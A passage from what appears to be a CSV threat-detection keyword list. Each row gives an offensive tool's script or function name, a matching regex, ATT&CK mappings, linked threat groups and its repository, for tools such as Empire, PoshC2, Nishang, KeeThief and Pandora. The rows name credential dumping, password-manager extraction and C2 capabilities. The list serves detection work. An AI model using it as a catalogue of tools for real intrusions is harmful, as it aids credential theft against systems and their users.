framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-PassHashes.ps1*",".{0,1000}Get\-PassHashes\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-PassHints*",".{0,1000}Get\-PassHints.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*get-passnotexp*",".{0,1000}get\-passnotexp.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get-password-policy.py*",".{0,1000}get\-password\-policy\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Get-PEBasicInfo*",".{0,1000}Get\-PEBasicInfo.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PEHeader.ps1*",".{0,1000}Get\-PEHeader\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*getPositionImplant*",".{0,1000}getPositionImplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Get-PotentialDLLHijack*",".{0,1000}Get\-PotentialDLLHijack.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*Get-PrivilegedGroupAccounts*",".{0,1000}Get\-PrivilegedGroupAccounts.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-PrivilegedGroupMembership*",".{0,1000}Get\-PrivilegedGroupMembership.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*getprivs.bin*",".{0,1000}getprivs\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*getprivs.exe*",".{0,1000}getprivs\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*get-process *amsi.dll*",".{0,1000}get\-process\s.{0,1000}amsi\.dll.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*GetProcHandleClient.exe *",".{0,1000}GetProcHandleClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*getProcUAC1password.h*",".{0,1000}getProcUAC1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*Get-RBCD-Threaded*",".{0,1000}Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","1","N/A","N/A","2","117","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" "*Get-RegistryAlwaysInstallElevated*",".{0,1000}Get\-RegistryAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-RegistryAlwaysInstallElevated*",".{0,1000}Get\-RegistryAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-RegistryAutoLogon*",".{0,1000}Get\-RegistryAutoLogon.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetRektBoy724/SharpUnhooker*",".{0,1000}GetRektBoy724\/SharpUnhooker.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","379","76","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get cached credentials (if any)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteDesktopUserSessionList*",".{0,1000}Get\-RemoteDesktopUserSessionList.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-RemoteDesktopUserSessionList.*",".{0,1000}Get\-RemoteDesktopUserSessionList\..{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get local account hashes","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteLocalAccountHash.json*",".{0,1000}Get\-RemoteLocalAccountHash\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get machine account hash for silver ticket attack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteMachineAccountHash.json*",".{0,1000}Get\-RemoteMachineAccountHash\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*getremoteprocesslisting*",".{0,1000}getremoteprocesslisting.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-RickAstley*",".{0,1000}Get\-RickAstley.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-RickAstley.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-RickAstley.ps1*",".{0,1000}Get\-RickAstley\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*gets4uticket.py*",".{0,1000}gets4uticket\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*Get-SccmCacheFolder*",".{0,1000}Get\-SccmCacheFolder.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-ScheduledTaskComHandler.json*",".{0,1000}Get\-ScheduledTaskComHandler\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*get-screenshot*",".{0,1000}get\-screenshot.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get-screenshotallwindows*",".{0,1000}get\-screenshotallwindows.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-SecurityPackages.ps1*",".{0,1000}Get\-SecurityPackages\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ShadowCopies*",".{0,1000}Get\-ShadowCopies.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-SharePointSiteURLs*",".{0,1000}Get\-SharePointSiteURLs.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Gets a list of SharePoint site URLs visible to the current user","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GetShellcode(*",".{0,1000}GetShellcode\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 